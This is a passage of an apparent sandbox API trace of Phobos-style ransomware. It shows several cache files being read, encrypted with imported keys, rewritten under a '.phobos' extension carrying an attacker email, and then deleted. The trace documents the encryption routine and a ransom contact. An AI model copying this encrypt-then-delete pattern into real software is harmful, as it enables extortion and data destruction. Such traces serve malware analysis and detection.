(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.114] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=390) returned 1 [0198.114] CloseHandle (hObject=0x140) returned 1 [0198.114] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6")) returned 0x2024 [0198.114] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.115] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.115] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.115] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.115] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x186, lpOverlapped=0x0) returned 1 [0198.116] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.116] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.117] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa329e8) returned 1 [0198.117] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.117] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.117] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.117] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.117] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.117] CloseHandle (hObject=0x140) returned 1 [0198.117] CloseHandle (hObject=0x15c) returned 1 [0198.117] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6")) returned 1 [0198.118] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.118] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=386) returned 1 [0198.118] CloseHandle (hObject=0x15c) returned 1 [0198.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e")) returned 0x2024 [0198.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.119] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.119] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.141] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.141] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.141] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x182, lpOverlapped=0x0) returned 1 [0198.142] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.142] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.142] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa329e8) returned 1 [0198.142] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.142] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.142] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.142] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.143] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.143] CloseHandle (hObject=0x15c) returned 1 [0198.143] CloseHandle (hObject=0x140) returned 1 [0198.143] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e")) returned 1 [0198.144] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.144] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=386) returned 1 [0198.144] CloseHandle (hObject=0x140) returned 1 [0198.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061")) returned 0x2024 [0198.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.145] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.145] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.145] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.145] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.145] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x182, lpOverlapped=0x0) returned 1 [0198.158] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.158] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.159] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32b68) returned 1 [0198.159] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.159] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.159] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.159] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.159] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.159] CloseHandle (hObject=0x140) returned 1 [0198.159] CloseHandle (hObject=0x15c) returned 1 [0198.159] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061")) returned 1 [0198.160] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.161] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=430) returned 1 [0198.161] CloseHandle (hObject=0x15c) returned 1 [0198.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450")) returned 0x2024 [0198.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.162] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.162] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.163] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.163] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.163] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1ae, lpOverlapped=0x0) returned 1 [0198.163] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0, dwBufLen=0x1b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1b0) returned 1 [0198.164] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1b0, lpOverlapped=0x0) returned 1 [0198.164] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32b68) returned 1 [0198.164] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.164] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.164] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.164] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.165] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.165] CloseHandle (hObject=0x15c) returned 1 [0198.165] CloseHandle (hObject=0x140) returned 1 [0198.165] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450")) returned 1 [0198.166] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.166] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=492) returned 1 [0198.166] CloseHandle (hObject=0x140) returned 1 [0198.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001")) returned 0x2024 [0198.167] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.167] CreateFileW 